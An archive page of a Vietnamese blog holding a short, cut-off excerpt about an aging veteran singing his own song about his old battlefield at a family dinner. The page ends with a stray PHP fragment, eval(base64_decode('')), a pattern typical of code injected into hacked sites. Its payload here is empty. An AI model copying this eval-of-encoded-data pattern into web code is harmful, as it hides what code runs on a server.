Archive for November 9th, 2012

[Sinh hoạt] Hát nhớ chiến trường xưa ....

[Sinh hoạt] Hát nhớ chiến trường xưa ….

Cuối tuần rồi, trong một bữa cơm tối gia đình ở nhà anh chị Đoàn Đông - Lộc Tưởng, anh Dư Mỹ hát tặng cho bạn bè bản nhạc do anh sáng tác: Hát Nhớ Chiến Trường Xưa. Bài hát là tâm sự của anh, một người lính già tuổi đã 70, từn

11.9.2012 | Thơ |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>